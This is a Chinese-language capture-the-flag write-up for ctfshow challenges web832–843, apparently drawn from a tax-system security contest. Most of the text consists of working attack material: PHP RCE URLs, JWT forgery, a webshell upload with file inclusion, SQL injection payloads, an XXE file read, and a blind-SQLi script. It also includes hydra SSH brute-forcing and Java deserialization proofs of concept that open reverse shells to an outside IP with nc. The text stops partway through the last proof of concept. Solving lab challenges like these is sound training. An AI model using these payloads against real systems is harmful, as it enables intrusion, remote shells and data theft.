Ctfshow 税务比武

友情提示：本文最后更新于 51 天前，文中的内容可能已有所发展或发生改变。

某省税务比赛题目，

web832

网络安全为人民

1
2
3
4
5
6
7
对过暗号，是自己人
朋友，欢迎你来到网安的世界
在这里你会见到不一样的风景
在这里你会遇到很多有趣而有爱的人
收下这个来自同行者的礼物
ctfshow{518e7701-8d8c-4598-bf3f-7601f0fdb69b}
愿你比赛愉快

web833

恢复源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// admin$ file check.php.bak
// check.php.bak: PHP script text, ASCII text
// admin$ cp check.php.bak check.php
<?php

error_reporting(0);

function getFilter($index=0){
    $filter=["strip_tags","addslashes"];
    return $index?$filter[1]:$filter[0];
}

function getHandle(){
    $filter=getFilter();
    $say=function($array) use (&$filter){
        extract($array);
        $hello=$filter($name);
        return $hello;
    };
    return $say;
}

$msg=getHandle();
$message="hello ".$msg($_REQUEST);




?>

use (&$filter)闭包通过引用的方式继承了外部的$filter变量，利用变量覆盖直接调用函数 RCE

1
2
/check.php?filter=system&name=ls
/check.php?filter=system&name=tac /fl*

web834

注册登录之后没看到有什么 cookie，修改密码之后终于获得了JWT cookie，secret 盲猜是 111111

1
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjdGZzaG93IiwibmFtZSI6InRlc3QifQ.-kj-qrzFxD2p717HfS_7GIPF7Wux4-qFiZpsJZyXRhQ

抓两个包，一鼓作气才能成功

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /user/reset HTTP/1.1
Host: fb1d236f-2279-4892-b335-9e3de23ed2e0.challenge.ctf.show
Cookie: username=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjdGZzaG93IiwibmFtZSI6ImFkbWluIn0.FcrF-obaYbX5IeT8CzUwU0EmSw_y1BOfzoX2QaN--4o; JSESSIONID=DB07CFF5804493E2D3478A0BF1F4ACC7
Content-Length: 31
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Origin: https://fb1d236f-2279-4892-b335-9e3de23ed2e0.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://fb1d236f-2279-4892-b335-9e3de23ed2e0.challenge.ctf.show/user/reset
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Priority: u=0, i
Connection: keep-alive

username=test1&password=test123

然后再修改密码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /user/changePass HTTP/1.1
Host: fb1d236f-2279-4892-b335-9e3de23ed2e0.challenge.ctf.show
Cookie: username=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJjdGZzaG93IiwibmFtZSI6ImFkbWluIn0.FcrF-obaYbX5IeT8CzUwU0EmSw_y1BOfzoX2QaN--4o; JSESSIONID=DB07CFF5804493E2D3478A0BF1F4ACC7
Content-Length: 16
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Origin: https://fb1d236f-2279-4892-b335-9e3de23ed2e0.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://fb1d236f-2279-4892-b335-9e3de23ed2e0.challenge.ctf.show/user/reset
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Priority: u=0, i
Connection: keep-alive

password=test123

再登陆即可

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
欢迎你，admin
这个不需要任何技术的漏洞，
出自国内某知名软件厂商。
每次看到这些东西，我都会想——
网络世界怎么了？
网络世界还会好么？
网络真的有安全么？

我不知道你是否也会迷茫。
但请不要绝望。
因为当我们扛起这面旗帜的那一刻，
除了坚守和胜利，
我们便再没有别的选择。
ctfshow{9887412f-22db-4ee0-8eee-c0bfda323d4a}

web835

admin\123456

1
2
3
4
5
欢迎你 admin

听说这个网站的管理员喜欢把核心源码备份一份，而且有强迫症的他必然会使用hbsw？.zip这个他喜欢的名字。

?为数字。

hbsw7.zip下载源码审计一下，发现就一个PHP文件

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<?php

error_reporting(0);
$action=$_GET['action'];

switch ($action) {
    case "upload":
        doUpload();
        break;
    case "include":
        doInclude();
    default:
        "nothing here";

}


function doInclude(){
    $file=$_POST['filename'];
    if(preg_match("/log|php|tmp/i",$file)){
        die("error filenname");
    }
    if(file_exists($file)){
        include "file://".$file;
    }
}

function doUpload(){
    if($_FILES["file"]["error"]>0){
        $ret = ["code"=>1,"msg"=>"文件上传失败"];
        die(json_encode($ret));
    }


    $file = $_FILES['file']['name'];
    $tmp_name=$_FILES['file']['tmp_name'];
    $content=file_get_contents($tmp_name);

    if(filter_filename($file)){
        $ret = ["code"=>2,"msg"=>"文件上传失败"];
        die(json_encode($ret));
    }

    if(filter_content($content)){
        $ret = ["code"=>3,"msg"=>"文件上传失败"];
        die(json_encode($ret));
    }

    move_uploaded_file($tmp_name,"./upload/".$file);
    $ret = ["code"=>0,"msg"=>"文件上传成功,文件路径为  /var/www/html/upload/".$file];
    die(json_encode($ret));
    
}

function filter_filename($file){
    $ban_ext=array("jpeg","png");
    $file_ext = end(explode(".",$file));
    return !in_array($file_ext,$ban_ext);
}

function filter_content($content){
    return preg_match("/php|include|require|get|post|request/i",$content);
}

可以文件上传，这里的waf也基本等于没有

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /api.php?action=upload HTTP/1.1
Host: aa32bbba-5889-49ce-a33e-15703bce13b2.challenge.ctf.show
Cookie: PHPSESSID=e75oqjbf3pe659gtr271342qdj
Content-Length: 205
Sec-Ch-Ua-Platform: "macOS"
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Sec-Ch-Ua: "Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvRFzjsQgqydZtqJC
Sec-Ch-Ua-Mobile: ?0
Origin: https://aa32bbba-5889-49ce-a33e-15703bce13b2.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://aa32bbba-5889-49ce-a33e-15703bce13b2.challenge.ctf.show/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryvRFzjsQgqydZtqJC
Content-Disposition: form-data; name="file"; filename="pwn.png"
Content-Type: image/png

<?=system($_COOKIE[1]);?>
------WebKitFormBoundaryvRFzjsQgqydZtqJC--

再包含图片即可

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST /api.php?action=include HTTP/1.1
Host: aa32bbba-5889-49ce-a33e-15703bce13b2.challenge.ctf.show
Cookie: PHPSESSID=e75oqjbf3pe659gtr271342qdj;1=tac FLAG_IS_HERE.php;
Content-Length: 47
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Origin: https://aa32bbba-5889-49ce-a33e-15703bce13b2.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://aa32bbba-5889-49ce-a33e-15703bce13b2.challenge.ctf.show/api.php?action=include
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Sec-Fetch-User: ?1
Priority: u=0, i
Connection: keep-alive

filename=%2Fvar%2Fwww%2Fhtml%2Fupload%2Fpwn.png

回显

1
2
3
4
5
6
7
8
YOUWIN;
ctfshow{e0a36685-5e6b-4c51-8e98-0cbe5c64315d}
拿好你的旗帜，然后我们去看看下一个。
相信我，这只是个开始，
弱口令、文件上传、多么古老的问题。
那么这个发生在我们身边故事已足够震撼
也许，一线大厂和我们有些距离
$success=<<<YOUWIN

web836

二次注入，这里我们选择报错注入来获得回显

1
111' and extractvalue(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()));#

再修改密码即可得到回显

以此类推，进行注入

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
111' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='app_flag'),0x7e));#

111' and extractvalue(1,concat(0x7e,(select flag from app_flag),0x7e));#

ctfshow{02f5decd-ff03-469a-bf6c

111' and extractvalue(1,concat(0x7e,(select right(flag,20) from app_flag),0x7e));#
'~a-bf6c-c7d7d0f981b8}~'


ctfshow{02f5decd-ff03-469a-bf6c-c7d7d0f981b8}

web837

下载配置文件

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8"?>
<configs>
    <config name="shutdown">
        <path>/usr/local/bin</path>
        <execute>shutdown.sh</execute>
        <args>-clear</args>
    </config>
</configs>

并且可以上传配置文件，直接打XXE攻击就行了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///flag">
]>
<configs>
    <config name="shutdown">
        <path>/usr/local/bin</path>
        <execute>shutdown.sh</execute>
        <args>&xxe;</args>
    </config>
</configs>

web838

发现任意文件读取

1
税务系统长久以来主要使用的系统构建语言就是java，在多次通报的*友软件漏洞中，均提及了其原生反序列化漏洞。

读取配置文件../WEB-INF/web.xml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
  <display-name>Archetype Created Web Application</display-name>
    <context-param>
        <param-name>contextConfigLocation</param-name>
        <param-value>/WEB-INF/applicationContext.xml</param-value>
    </context-param>
    <listener>
        <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
    </listener>
    <filter>
        <filter-name>charset</filter-name>
        <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class>
        <init-param>
            <param-name>encoding</param-name>
            <param-value>utf-8</param-value>
        </init-param>
    </filter>

    <filter-mapping>
        <filter-name>charset</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <servlet>
        <servlet-name>dispatcher</servlet-name>
        <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
        <init-param>
            <param-name>contextConfigLocation</param-name>
            <param-value>/WEB-INF/dispatcher-servlet.xml</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>
    <servlet-mapping>
        <servlet-name>dispatcher</servlet-name>
        <url-pattern>/</url-pattern>
    </servlet-mapping>

</web-app>

读取 servlet 配置文件../WEB-INF/dispatcher-servlet.xml

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:mvc="http://www.springframework.org/schema/mvc"
       xmlns:context="http://www.springframework.org/schema/context"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd">

    <context:annotation-config />

    <mvc:annotation-driven/>


    <mvc:resources mapping="/layui/**" location="/WEB-INF/static/layui/" />
    <mvc:resources mapping="/images/**" location="/WEB-INF/static/images/" />
    <mvc:resources mapping="/css/**" location="/WEB-INF/static/css/" />

    <mvc:default-servlet-handler />


    <bean id="defaultViewResolver" class="org.springframework.web.servlet.view.InternalResourceViewResolver">
        <property name="viewClass" value="org.springframework.web.servlet.view.JstlView"/>
        <property name="prefix" value="/WEB-INF/views/"/>
        <property name="suffix" value=".jsp"/>
        <property name="exposeContextBeansAsAttributes" value="true"/>
    </bean>

    <!-- IndexController-->
    <context:component-scan base-package="com.ctfshow.controller"/>
</beans>

读取控制器../WEB-INF/classes/com/ctfshow/controller/IndexController.class

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.ctfshow.controller;

import com.ctfshow.entity.User;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
@RequestMapping({"/"})
public class IndexController {
    @RequestMapping(
        value = {"/"},
        method = {RequestMethod.GET}
    )
    public String index() {
        return "index";
    }

    @RequestMapping(
        value = {"/"},
        method = {RequestMethod.POST}
    )
    @ResponseBody
    public String index(HttpServletRequest request) {
        User user = null;

        try {
            byte[] userData = Base64.getDecoder().decode(request.getParameter("userData"));
            ObjectInputStream safeObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(userData));
            user = (User)safeObjectInputStream.readUnshared();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
            return "User class can not unserialize";
        } catch (Exception e) {
            e.printStackTrace();
            return "unserialize error";
        }

        return "unserialize done, you username is " + user.getUsername();
    }
}

给了反序列化接口，读取User类看看../WEB-INF/classes/com/ctfshow/entity/User.class

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.ctfshow.entity;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.lang.reflect.InvocationTargetException;
import java.util.Objects;

public class User implements Serializable {
    private static final long serialVersionUID = 1L;
    private int id;
    private String username;
    private String password;
    private String email;
    private String address;

    public int getId() {
        return this.id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public String getUsername() {
        return this.username;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public String getPassword() {
        return this.password;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public boolean equals(Object o) {
        if (this == o) {
            return true;
        } else if (o != null && this.getClass() == o.getClass()) {
            User user = (User)o;
            return Objects.equals(this.username, user.username) && Objects.equals(this.password, user.password);
        } else {
            return false;
        }
    }

    public int hashCode() {
        return Objects.hash(new Object[]{this.id, this.username, this.password});
    }

    public String getEmail() {
        return this.email;
    }

    public void setEmail(String email) {
        this.email = email;
    }

    public boolean isNull() {
        if (null != this.username && !this.username.isEmpty()) {
            return null == this.password || this.password.isEmpty();
        } else {
            return true;
        }
    }

    private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        input.defaultReadObject();
        Class.forName(this.username).getMethod(this.email, String.class).invoke(Class.forName(this.username).getMethod(this.password).invoke(Class.forName(this.username)), this.address);
    }
}

User#readObject直接进行了反射，还需要在User类里面加一个setAddress方法

1
2
3
    public void setAddress(String address) {
        this.address = address;
    }

写出 poc，

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
package com.ctfshow.entity;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;

public class web858 {
    public static void main(String args[]) throws Exception{
        User user = new User();
        user.setUsername("java.lang.Runtime");
        user.setPassword("getRuntime");
        user.setEmail("exec");
        user.setAddress("nc 154.36.181.12 12345 -e /bin/sh");

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(user);
        oos.close();

        String base64Str = Base64.getEncoder().encodeToString(barr.toByteArray());
        System.out.println(base64Str);
    }
}

web839

反编译APK文件

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
package com.ctfshow.ctferpro.data;

import com.ctfshow.ctferpro.data.Result;
import com.ctfshow.ctferpro.data.model.LoggedInUser;
import com.ctfshow.ctferpro.util.CryptoJS;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.UUID;

/* loaded from: classes5.dex */
public class LoginDataSource {
    private String authURL = "http://www.xxxx.com/app/auth";

    public Result<LoggedInUser> login(String username, String password) {
        try {
            String uuid = UUID.randomUUID().toString();
            Runtime.getRuntime().exec("curl -d 'username=" + new String(Base64.getEncoder().encode(CryptoJS.encode(username, uuid).getBytes(StandardCharsets.UTF_8))) + "' -d 'password=" + password + "' -b 'uuid=" + uuid + "' -H 'User-Agent: ctfer_pro_app' " + this.authURL);
            LoggedInUser fakeUser = new LoggedInUser(uuid, "用户 " + uuid + " 激活失败");
            return new Result.Success(fakeUser);
        } catch (Exception e) {
            return new Result.Error(new IOException("Error logging in, authURL 应替换为题目URL地址", e));
        }
    }

    public void logout() {
    }
}

看到这里可以进行参数注入，需要POST传参

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
package com.ctfshow.ctferpro.util;

/* loaded from: classes7.dex */
public class CryptoJS {
    public static String encode(String aInput, String key) {
        int[] iS = new int[256];
        byte[] iK = new byte[256];
        for (int i = 0; i < 256; i++) {
            iS[i] = i;
        }
        for (short i2 = 0; i2 < 256; i2 = (short) (i2 + 1)) {
            iK[i2] = (byte) key.charAt(i2 % key.length());
        }
        int j = 0;
        for (int i3 = 0; i3 < 255; i3++) {
            j = ((iS[i3] + j) + iK[i3]) % 256;
            int temp = iS[i3];
            iS[i3] = iS[j];
            iS[j] = temp;
        }
        int i4 = 0;
        int j2 = 0;
        char[] iInputChar = aInput.toCharArray();
        char[] iOutputChar = new char[iInputChar.length];
        short x = 0;
        while (x < iInputChar.length) {
            i4 = (i4 + 1) % 256;
            j2 = (iS[i4] + j2) % 256;
            int temp2 = iS[i4];
            iS[i4] = iS[j2];
            iS[j2] = temp2;
            int t = (iS[i4] + (iS[j2] % 256)) % 256;
            int iY = iS[t];
            char iCY = (char) iY;
            iOutputChar[x] = (char) (iInputChar[x] ^ iCY);
            int temp3 = x + 1;
            x = (short) temp3;
        }
        return new String(iOutputChar);
    }
}

逆向加解密算法才行，简单的魔改rc4算法，发现，加密和解密是同一个方法，相当于我们已经控制任意参数加密，下一步不明白怎么做了，注入的地方给了一部分 header，测试 sql 注入成功，写出脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import httpx
import base64
import time
import string

def rc4_custom(data, key):
    S = list(range(256))
    j = 0
    for i in range(255): 
        j = (S[i] + j + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]

    i = j = 0
    out = []
    for char in data:
        i = (i + 1) % 256
        j = (S[i] + j) % 256
        S[i], S[j] = S[j], S[i]
        t = (S[i] + S[j]) % 256
        out.append(ord(char) ^ S[t])
    return out

def java_utf8_encode(int_list):
    s = "".join([chr(c) for c in int_list])
    return s.encode('utf-8')

def encrypt_payload(plain_text, key):
    rc4_ints = rc4_custom(plain_text, key)
    utf8_bytes = java_utf8_encode(rc4_ints)
    return base64.b64encode(utf8_bytes).decode('utf-8')

target_url = "https://5066e861-f1f9-4628-904f-c156ff0eb83d.challenge.ctf.show/app/auth" 
STATIC_UUID = "123456"

alphabet = string.ascii_letters + string.digits + string.punctuation

def check_boolean(sql_condition):
    payload_fmt = "1' union select 1, if(({}), 1, 0);#"
    payload = payload_fmt.format(sql_condition)
    
    encrypted_username = encrypt_payload(payload, STATIC_UUID)
    
    data = {"username": encrypted_username, "password": "1"}
    cookies = {"uuid": STATIC_UUID}
    headers = {"User-Agent": "ctfer_pro_app"}

    try:
        res = httpx.post(target_url, data=data, cookies=cookies, headers=headers, verify=False, timeout=10)
        return "success" in res.text
    except Exception as e:
        return False

def run():
    print(f"[*] Target: {target_url}")
    table_name = ""
    for i in range(1, 50):
        found = False
        for char in alphabet:
            # sql = f"ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={ord(char)}"
            # sql = f"ascii(substr((select column_name from information_schema.columns where table_name='app_f1ag' limit 0,1),{i},1))={ord(char)}"

            sql = f"ascii(substr((select f1ag from app_f1ag limit 0,1),{i},1))={ord(char)}"


            print(f"\rCurrent Table: {table_name}{char}", end="")
            
            if check_boolean(sql):
                table_name += char
                found = True
                break
        
        if not found:
            print("\n[!] 字符未匹配或表名结束。")
            break
            
    print(f"\n\n[+] Found Table Name: {table_name}")
    
    if table_name:
        print(f"[*] 下一步建议: 修改脚本查询表 `{table_name}` 中的字段。")
    else:
        print("[-] 未能跑出表名，可能是 information_schema 被过滤，或者无法访问。")

if __name__ == "__main__":
    run()

web841

给了一个字典，考察 ssh 爆破

1
2
3
4
brew install hydra

hydra -l user -P pass.dic -s 28117 -t 4 ssh://pwn.challenge.ctf.show
ssh user@pwn.challenge.ctf.show -p28117

web842

1
2
3
4
5
python3 -m pip install -i https://pypi.org/simple/ GitHacker


githacker --help
githacker --url https://f8452be2-82a5-4157-9853-9e3ff5fe8ac2.challenge.ctf.show/.git/ --output-folder result

结果失败了，好像是因为它并不是一个 git 仓库

1
2
3
git clone https://github.com/lijiejie/GitHack.git
cd GitHack
python2 GitHack.py https://f8452be2-82a5-4157-9853-9e3ff5fe8ac2.challenge.ctf.show/.git/

得到了源码

1
2
3
4
5
6
7
8
9
<?php

error_reporting(0);

if(isset($_POST['code'])){
	$code = $_POST['code'];
	system("echo $code|base64");
}
//code=1;cat /flag;echo 1

web843

30M的源码，Emm，可以的，看了下依赖，就是一个Spring，啥也没有

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
package com.ctfshow.filter;

import com.ctfshow.entity.User;
import com.ctfshow.util.CookieUtil;
import com.mysql.jdbc.NonRegisteringDriver;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.core.annotation.Order;
import org.springframework.jdbc.datasource.init.ScriptUtils;
import org.springframework.transaction.interceptor.RuleBasedTransactionAttribute;

/* JADX WARN: Classes with same name are omitted:
  CookieFilter.class
 */
@WebFilter(filterName = "CookieFilter", urlPatterns = {ScriptUtils.DEFAULT_BLOCK_COMMENT_START_DELIMITER})
@Order(Integer.MAX_VALUE)
/* loaded from: source.zip:WEB-INF/classes/com/ctfshow/filter/CookieFilter.class */
public class CookieFilter implements Filter {
    @Override // javax.servlet.Filter
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    @Override // javax.servlet.Filter
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws ServletException, IOException {
        String token = CookieUtil.getCookieValue((HttpServletRequest) servletRequest, "token", true);
        if (null != token && token != "") {
            byte[] base = Base64.getDecoder().decode(URLDecoder.decode(token, "UTF-8").replace(" ", RuleBasedTransactionAttribute.PREFIX_COMMIT_RULE).getBytes(StandardCharsets.UTF_8));
            ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(base));
            try {
                User user = (User) objectInputStream.readObject();
                if (null != user && user.getUsername().equals("admin")) {
                    servletRequest.setAttribute(NonRegisteringDriver.USER_PROPERTY_KEY, user);
                }
            } catch (ClassNotFoundException e) {
                throw new RuntimeException(e);
            }
        } else {
            User user2 = new User("guest");
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(user2);
            String cookieToken = new String(Base64.getEncoder().encode(byteArrayOutputStream.toByteArray()));
            CookieUtil.setCookie((HttpServletRequest) servletRequest, (HttpServletResponse) servletResponse, "token", URLEncoder.encode(cookieToken, "UTF-8"));
        }
        filterChain.doFilter(servletRequest, servletResponse);
    }

    @Override // javax.servlet.Filter
    public void destroy() {
    }
}

这里会进行反序列化，config 类里面有直接可以利用的ProcessBuilder().start()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
package com.ctfshow.entity;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.lang.reflect.InvocationTargetException;

/* JADX WARN: Classes with same name are omitted:
  Config.class
 */
/* loaded from: source.zip:WEB-INF/classes/com/ctfshow/entity/Config.class */
public class Config implements Serializable {
    private static final long serialVersionUID = 1;
    private String name = "";
    private String path = "";
    private String execute;
    private String[] args;

    public String getName() {
        return this.name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getPath() {
        return this.path;
    }

    public void setPath(String path) {
        this.path = path;
    }

    public String getExecute() {
        return this.execute;
    }

    public void setExecute(String execute) {
        this.execute = execute;
    }

    public String[] getArgs() {
        return this.args;
    }

    public void setArgs(String[] args) {
        this.args = args;
    }

    private void readObject(ObjectInputStream input) throws IllegalAccessException, NoSuchMethodException, ClassNotFoundException, IOException, InvocationTargetException {
        input.defaultReadObject();
        new ProcessBuilder(this.args).start();
    }
}

写出poc

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
package com.ctfshow.entity;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.net.URLEncoder;

public class web843 {
    public static void main(String[] args) throws Exception {
        Config config = new Config();

        String ip = "154.36.181.12";
        String port = "12345";
        String cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + ip + " " + port + " >/tmp/f";

        config.setArgs(new String[]{"/bin/sh", "-c", cmd});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
